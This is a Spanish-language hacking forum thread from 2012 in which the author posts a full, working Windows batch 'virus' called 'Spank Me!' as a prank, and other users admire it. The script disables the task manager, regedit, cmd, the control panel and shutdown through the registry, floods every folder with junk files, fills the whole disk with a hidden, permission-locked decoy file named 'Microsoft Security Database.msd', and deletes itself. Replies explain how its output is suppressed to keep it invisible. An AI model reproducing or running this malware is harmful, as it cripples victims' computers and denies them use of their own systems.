[Batch] [Virus] Spank Me!

Iniciado por Eleкtro, 3 Febrero 2012, 04:23 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Eleкtro

3 Febrero 2012, 04:23 AM Ultima modificación: 3 Febrero 2012, 04:26 AM por EleKtro H@cker
Miren lo que hace el aburrimiento :silbar:

El script no borra archivos, Está pensado para gastar una broma muuuuuuuuuuuy pesada, Pero sin borrar nada, No hay que ser tán malos... >:D

Todo está explicado en el script.



Spank Me! (Bitch)

Nivel destructivo: 4/10

- Deshabilita componentes del sistema operativo.

- Genera archivos de 1 byte con nombre aleatorio por todas las carpetas dle disco duro. 100 archivos por cada carpeta.

- Genera un archivo vacío (Dummy) consumiendo todo el espacio libre del disco duro.






Código (dos) [Seleccionar]
@Echo OFF

:::::::::::::::::::::::::
:     Spank Me! 1.0    
:                       :
:  By EleKtrO H@ckeR    :
:                       :
: Testeado en Windows 7 :
:::::::::::::::::::::::::





REM: Deshabilita la ejecución de archivos REG
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2>&1

FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do (

REM: Deshabilita el acceso a todas las aplicaciones (Inicio > Ejecutar)
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el administrador de tareas
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el apagado del PC
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el cambio de usuario de sesión del PC
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el menú contextual del ratón
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el menú contextual del menú inicio
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita modificaciones en el menú inicio
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el panel de control
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el regedit
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita la consola de windows
reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1
)





REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Crea archivos de 1 byte, Con nombre aleatorio, En todos los directorios del disco duro
REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

setlocal enabledelayedexpansion
Set File=0

For /F "Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@)
Goto :Dummy

:Copy
Fsutil file createnew "%*\%Random%%Random%%Random%%Random%%Random%" 1 >NUL 2>&1
Set /A File+=1
If !FILE! EQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*)





REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Crea un archivo "dummy" consumiendo TODO el espacio libre del disco duro.
REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:DUMMY

REM: Permisos
Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls     "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1


REM Crear el Dummy
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
Set Size=%%f
Set Size=!Size:~-0,-6!
Set Size=!Size!000000
Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
)


REM Protección Anti-Borrado
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1


:FIN
Del /Q %0
Exit







Dany3j

#1
3 Febrero 2012, 06:20 AM
Muy bueno el código Pitoloko Por cierto para que usas NUL 2>&1  :huh:
"Pensando en Batch" XD

Eleкtro

#2
3 Febrero 2012, 07:25 AM
Cita de: TheTroyanDark en  3 Febrero 2012, 06:20 AM
Muy bueno el código Pitoloko Por cierto para que usas NUL 2>&1  :huh:

Para que no aparezca la salida de los comandos en la pantalla, osea, para que séa un poco más "invisible" xD







WaAYa HaCK

#3
3 Febrero 2012, 14:13 PM
Eeeh... te aburres mucho no?  >:D

Venga ya, yo tenía uno en batch que hacía lo mismo, cambiaba todas las extensiones de archivo por .fap y, además, cambiaba el fondo de escritorio con fotos guarras cada 2 minutos xDDDD
La cacatúa yoyó es nueva en el zoo!

Dany3j

#4
3 Febrero 2012, 14:54 PM
A ok Pitoloko. NUL 2>&1 pero digo porque el 2 y el 1 no es lo mismo poner >nul

Salu2
"Pensando en Batch" XD

Eleкtro

#5
4 Febrero 2012, 06:13 AM
Cita de: WaAYa HaCK en  3 Febrero 2012, 14:13 PM
cambiaba todas las extensiones de archivo por .fap

XDDDD que bueno tu virus



Cita de: TheTroyanDark en  3 Febrero 2012, 14:54 PM
el 2 y el 1 no es lo mismo poner >nul
no

con ">" redireccionas la salida normal, y con "2>" redireccionas la salida de errores del comando.


saludos







Dany3j

#6
4 Febrero 2012, 19:29 PM
A ok ya entiendo Gracias Pitoloko  ;-)
"Pensando en Batch" XD
Imprimir
Ir Arriba Páginas1
Acciones del Usuario